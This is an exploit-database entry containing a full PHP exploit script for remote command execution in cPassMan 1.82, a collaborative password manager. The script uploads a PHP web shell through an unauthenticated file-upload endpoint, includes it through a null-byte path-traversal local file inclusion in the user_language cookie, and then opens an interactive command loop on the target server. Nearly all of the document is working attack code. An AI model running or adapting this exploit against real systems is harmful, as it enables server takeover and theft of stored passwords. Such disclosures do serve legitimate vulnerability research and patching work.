cPassMan 1.82 - Remote Command Execution

EDB-ID:

18522

CVE:



Author:

ls

Type:

webapps


Platform:

PHP

Date:

2012-02-25


Product.                       Collaborative Passwords Manager (cPassMan)
Platform.                      Independent (PHP)
Affected versions.             1.82

<?php
/*
 * cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)
 * Disclaimer: cPassMan developer was notified of vulnerabilities in April 2011 and advised that v1.x was no longer supported.
 * Note: Requires PHP 5.3.3 or lower due to the use of a poison null byte in the LFI.
 */

if ($argc < 3) {
  print "Usage: php -f {$argv[0]} <host> <path> (e.g. php -f {$argv[0]} 192.168.129.130 /cpassman)\n";
  exit();
}

print "--------------------------------------------------------------------------------\n";
print "cPassMan v1.82 Remote Command Execution Exploit by ls (contact@kaankivilcim.com)\n";
print "--------------------------------------------------------------------------------\n";

$host = $argv[1];
$path = $argv[2];

$port = 80;

/*
 * Stage One: Unauthenticated Arbitrary File Upload
 * Uploaded files are stored in the document root of the web server as a file with the MD5 hash of the original filename.
 */

print "[*] Stage One: Uploading command execution handler... ";

$upload_path = $path . "/includes/libraries/uploadify/uploadify.php";
$fp = fsockopen($host, $port, $errno, $errstr, 30);

if ($fp) {
  fputs($fp, "POST $upload_path HTTP/1.1\r\n");
  fputs($fp, "Host: $host\r\n");
  fputs($fp, "Content-Type: multipart/form-data; boundary=---------------------------4827543632391\r\n");
  fputs($fp, "Content-Length: 233\r\n\r\n");
  fputs($fp, "-----------------------------4827543632391\r\n");
  fputs($fp, "Content-Disposition: form-data; name=\"Filedata\"; filename=\"rabbit.txt\";\r\n");
  fputs($fp, "Content-Type: text/plain\r\n\r\n");
  fputs($fp, "<?php echo system(\$_GET['z']); die(); ?>\r\n");
  fputs($fp, "-----------------------------4827543632391--\r\n\r\n");

  $result = fgets($fp, 16);
  fclose($fp);
}

if (strstr($result, "200 OK")) {
  print "Success!\n";
}

/*
 * Stage Two: Local File Inclusion
 * Several LFI vulnerabilities exist in the user language selection functionality. The exploit uses the user_language cookie attack vector.
 */

print "[*] Stage Two: Confirming command execution via local file inclusion... ";

$cmd = "echo rabbit";
$success = FALSE;

$stdin = fopen("php://stdin","r");

do {
  $cmd = str_replace(" ", "+", $cmd);
  $lfi_path = $path . "/index.php?z=" . $cmd;

  $fp = fsockopen($host, $port, $errno, $errstr, 30);
  
  if ($fp) {
    fputs($fp, "GET $lfi_path HTTP/1.1\r\n");
    fputs($fp, "Host: 192.168.129.130\r\n");
    fputs($fp, "Cookie: user_language=../../../89f84a8775dd8f60cdbdef0d73919511%00\r\n");
    fputs($fp, "Content-Length: 0\r\n\r\n");
  
    for ($i = 0; $i < 13; $i++) {
      fgets($fp, 2048);
    }
  
    $output = "\n";

    while (($tmp = fgets($fp, 2048)) != FALSE && !feof($fp)) {
      $output .= $tmp;
    }

    if ($success) {
      echo $output;
    }
  
    fclose($fp);
  }

  if (!$success && strstr($output, "rabbit")) {
    $success = TRUE;
    print "Success!\n";
  }

  print "\n> ";
} while ($cmd = trim(fgets($stdin)));
?>